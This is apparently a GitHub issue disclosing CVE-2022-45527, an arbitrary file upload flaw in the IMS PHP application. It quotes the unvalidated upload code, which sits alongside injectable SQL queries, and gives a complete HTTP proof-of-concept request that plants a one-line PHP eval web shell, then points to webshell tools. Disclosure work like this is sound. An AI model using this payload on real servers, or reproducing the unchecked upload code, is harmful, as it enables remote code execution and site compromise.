CVE-2022-45527: IMS has an arbitrary file upload vulnerability · Issue #2 · Future-Depth/IMS

Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4****1.File upload vulnerability

In the file admin_ Area/courseinsert.php, in line 234-239 of the code

<table border=’2’ align="center"><form method="post" action="course_insert.php" enctype="multipart/form-data"> <tr><td>COURSE NAME : </td><td><input type="text" name="cname" required="" autocomplete="off"></td></tr> <tr><td>DURATION : </td><td><input type="text" name="drn" required="" autocomplete="off"></td></tr> <tr><td>FEES : </td><td><input type="text" name="fee" required="" autocomplete="off"></td></tr> <tr><td>UPLOAD PHOTO :</td><td><input type="file" name="pht" required="" autocomplete="off"></td></tr> <tr><td></td><td><button class="btn btn-primary btn-lg">Insert Course</button></td></tr>

After entering the information, click the button to send the information to course in post mode_ insert.php

, continue to follow up the code

course_insert.php：

In lines 10 - 13：

$fname=$_FILES[‘pht’][‘name’]; $file_temp_loc =$_FILES[‘pht’][‘tmp_name’]; $file_store="courseimg/".$fname; move_uploaded_file($file_temp_loc,$file_store);

$_ FILES Get the file information uploaded by post, $file_ store

Define the file storage location. In this process, the uploaded file type is not verified. Use move_ uload_ file()

Function to transfer all uploaded files to courseimg/directory

In lines 14 to 28

$s=mysqli_query($con,"insert into course(c_name,duration,fees,photo) values(‘$cname’,’$drn’,’$fee’,’$file_store’)"); if($s==1) { $t=mysqli_query($con,"select * from course where c_name=’$cname’"); $r=mysqli_fetch_array($t); $id=$r[‘id’]; $i=100+$id; $uid="BTT/CRS/".$i; $udt=mysqli_query($con,"update course set c_id=’$uid’ where c_name=’$cname’"); header(“location:courseinsert.php?ms=done”); } else { header(“location:courseinsert.php?ms=not_done”); }

mysqli_ query returns the execution result of the database statement. $s is the value returned by executing the SQL statement. If the SQL statement is executed successfully, it returns true, $s==1. When new data is inserted into the database, the url jumps to: courseinsert.php? ms=done

Otherwise, the url will jump to courseinsert. php? ms=not_ done

To sum up, in the process of uploading a file, first upload the file to the local courseimg directory, and then save the path of the successfully uploaded file in the database

Therefore, even if the uploaded file is not stored in the database, the uploaded file will be saved in the courseimg/directory under the current path, which is: admin_ area/courseimg/

Upload-POC:

POST /admin_area/course_insert.php HTTP/1.1 Host: imsvul.test Content-Length: 500 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://imsvul.test Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1EAN9nvnAL0aI3UM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://imsvul.test/admin_area/courseinsert.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a Connection: close

------WebKitFormBoundary1EAN9nvnAL0aI3UM Content-Disposition: form-data; name="cname"

ace ------WebKitFormBoundary1EAN9nvnAL0aI3UM Content-Disposition: form-data; name="drn"

ace ------WebKitFormBoundary1EAN9nvnAL0aI3UM Content-Disposition: form-data; name="fee"

ace ------WebKitFormBoundary1EAN9nvnAL0aI3UM Content-Disposition: form-data; name="pht"; filename="ace.php" Content-Type: application/octet-stream

<?php eval($_POST[“ace”]);?> ------WebKitFormBoundary1EAN9nvnAL0aI3UM–

After sending the POC packet, click admin_ area/courseimg/ Generate a PHP file named ace under the directory

Connect using the webshell administration tool